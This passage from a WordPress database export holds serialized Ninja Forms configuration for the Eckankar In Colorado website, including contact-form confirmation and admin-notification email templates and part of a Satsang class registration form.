role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\"> </span><span style=\"color: #666666;\"> </span></td>                </tr>                <tr>                  <td style=\"padding:5px 30px 20px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 20px 0;color:#153643;\">                            <div style=\"text-align: center; \"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                    <p style=\"font-size:25px;\"><strong>Hello                                        {field:textbox_142}</strong></p>                                    <p style=\"font-size:22px;\">Thanks for                                      getting in touch!</p>                                    <p style=\"font-size:17px;\">You have created                                      a new form submission on the Eckankar In                                      Colorado website requesting contact with a                                      person on the Loveland ECK Leadership                                      Communications team.</p>                                    <p style=\"font-size:17px;\">You will be                                      contacted soon regarding your inquiry.</p>                                    <p style=\"font-size:19px;\"><strong>Here is a                                        copy of the information that you have                                        submitted:</strong><span><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"></span></span></span></p>                                  </span></span></span></div>                          </td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc;\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO                                                  CONTACT:&nbsp;</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#c95f13;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:16px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact                              the Eckankar In Colorado webmaster: <br>                              <a href=\"mailto:webmaster@eckankar-colorado.org\" style=\"color: #ffffff;\">webmaster@eckankar-colorado.org</a><br>                              <br>                              <a href=\"https://www.eckankar-colorado.org\" style=\"color: #ffffff;\">Eckankar                                In Colorado</a> </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>  \";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:255;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-07-04 09:22:26\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:256;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-07-04 09:22:26\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:34:\"Loveland Initiators and ESAâs\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:13:\"email_message\";s:7735:\"      <meta charset=\"UTF-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>Ninja Forms - ADMIN NOTIFICATION-FINAL</title>    <!--[if mso]>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">            </table>            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:center;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\">Admin                      Notification<br>                    </span><span style=\"color: #666666;\"> </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0; margin-top: -25px;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 20px 0;color:#153643; \">                            <p style=\"font-size: 20px; margin: 0px 0px 20px; font-family: Arial,sans-serif; text-align: center;font-size:30px; color:#f28a27;\"><strong>New                                <strong><span id=\"nf-drawer-content\" style=\"color: #4f759b;\"><span></span></span></strong></strong></p>                            <strong><strong> </strong>                              <p style=\"color: #23507d;text-align:center;font-size:23px;\" class=\"nf-setting-groups\"><strong><span class=\"nf-field-settings\">{form:title}</span><span>                                  </span>Form Submission</strong></p>                            </strong>                            <div style=\"text-align: center;\"><strong> This form                                was generated from a user submission on the <em>Eckankar                                  In Colorado</em> website. You are receiving                                this submission because you are listed as a                                contact for the <em>Loveland ECK Leadership                                  organization</em>.</strong><br>                              <strong> <strong></strong></strong><br>                              <strong><strong> The following person has                                  requested contact with an ECK representative.                                  Here is the information that <span style=\"color: #666666\">{field:textbox_142}                                    {field:lastname_143}</span> has submitted:</strong>                              </strong></div>                            <strong>                              <p></p>                            </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc; text-align:left;\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO                                                  CONTACT:&nbsp;</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:16px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              <span style=\"color #ffffff;\">                                webmaster@eckankar-colorado.org</span><br>                              <br>                              <a href=\"https://www.eckankar-colorado.org\" style=\"color: #ffffff;\">Eckankar                                In Colorado</a> </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>      \";}s:2:\"id\";i:257;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:43:\"Initiators and ESA\'s - TESTING ONLY!!!!!!!!\";s:10:\"created_at\";s:19:\"2023-07-04 09:22:26\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 17:38:36\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:11:{i:0;s:8:\"html_141\";i:1;s:11:\"textbox_142\";i:2;s:12:\"lastname_143\";i:3;s:9:\"email_144\";i:4;s:9:\"phone_145\";i:5;s:14:\"listselect_146\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166666321\";i:7;s:12:\"textarea_150\";i:8;s:18:\"html_1663797373767\";i:9;s:10:\"submit_152\";i:10;s:18:\"html_1663797370980\";}s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:24:\"form_title_heading_level\";s:1:\"3\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(63,'a:7:{s:2:\"id\";i:63;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:14:{i:0;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:1200:\"<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 33px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">2023-2024<br>Colorado &amp; Utah</p><p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 43px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">ECK Satsang Class Registration</p><div style=\"line-height: 150%;padding-top: 16px;\"><div align=\"center\"><span style=\"font-size: 24px; line-height: 150%; color:#b8860b !important;\"><strong>This form is only for residents of Colorado and Utah. </strong></span><br><span style=\"font-size: 24px; line-height: 150%;\"><strong></strong></span></div><span style=\"font-size: 20px; line-height: 150%;\"><br></span></div><div style=\"line-height: 150%;font-size: 20px;color: #333333; background-color: #efefef; padding: 10px; border: 1px solid #d7d7d7;\" align=\"center\"><b>NOTE: </b>Satsang Class registration must be completed by the 3rd class meeting.<br>After this date, registrations will no longer be accepted.<span style=\"font-size: 20px; line-height: 150%;\"><br></span></div>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1632671894259\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:18:\"html_1632671894259\";}s:2:\"id\";i:682;}i:1;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:4:\"type\";s:2:\"hr\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:16:\"hr_1639606449220\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:16:\"hr_1639606449220\";}s:2:\"id\";i:671;}i:2;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:26:\"Satsang Class Registration\";s:9:\"field_key\";s:40:\"satsang_class_registration_1632437126898\";s:3:\"key\";s:40:\"satsang_class_registration_1632437126898\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:163:\"<p style=\"font-size:18px;\" align=\"center\">Please fill in your details in the \'Satsang Class Registration\' form below and you will be automatically registered.</p>\n\";s:14:\"drawerDisabled\";b:0;s:5:\"label\";s:26:\"Satsang Class Registration\";}s:2:\"id\";i:670;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:56:\"<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name\";s:3:\"key\";s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:56:\"<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name\";s:9:\"field_key\";s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:679;}i:4;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:55:\"<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name\";s:3:\"key\";s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:55:\"<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name\";s:9:\"field_key\";s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:677;}i:5;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:55:\"<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email\";s:3:\"key\";s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:55:\"<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email\";s:9:\"field_key\";s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:678;}i:6;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"value\";s:0:\"\";s:9:\"field_key\";s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";s:11:\"field_label\";s:52:\"<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone\";s:11:\"custom_mask\";s:0:\"\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:5:\"label\";s:52:\"<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone\";s:3:\"key\";s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";}s:2:\"id\";i:676;}i:7;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_1\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_1\";}s:2:\"id\";i:675;}i:8;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";b:0;s:5:\"label\";s:42:\"ECK Member Classes Available for 2023-2024\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:1342:\"<div style=\"font-size: 20px;color: #333333; background-color: #efefef; padding: 10px; border: 1px solid #d7d7d7;line-height: 95%;\"><p class=\"\" style=\"font-family: Open Sans; font-size: 20px; text-transform: none; color: rgb(29, 87, 145); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><b>Classes are open to all Chelas residing within Colorado and Utah. Available class formats include:</b></p>\n<ul>\n<li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">In Person Classes<br></span></li>\n<li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Zoom Classes<br></span></li>\n  <li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Hybrid Classes  <span style=\"font-size:19px\">(<i>Hybrid events combine in person and online attendance</i></span>)</span><br><em></em></li>\n</ul>\n</div>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:56:\"eck_member_classes_available_for_2023-2024_1693928749137\";s:11:\"field_label\";s:42:\"ECK Member Classes Available for 2022-2023\";s:9:\"field_key\";s:56:\"eck_member_classes_available_for_2022-2023_1660414260469\";}s:2:\"id\";i:683;}i:9;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"10\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:31:\"Select One Class Per Registrant\";s:4:\"type\";s:9:\"listradio\";s:3:\"key\";s:45:\"select_one_class_per_registrant_1658696832524\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:17:{i:0;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:0;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:78:\"The Easy Way Discourses - STARTS IN DECEMBER -- 1st Thursday at 7:00 pm - Zoom\";s:5:\"value\";s:77:\"The Easy Way Discourses - STARTS IN DECEMBER -- 1st Thursday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span 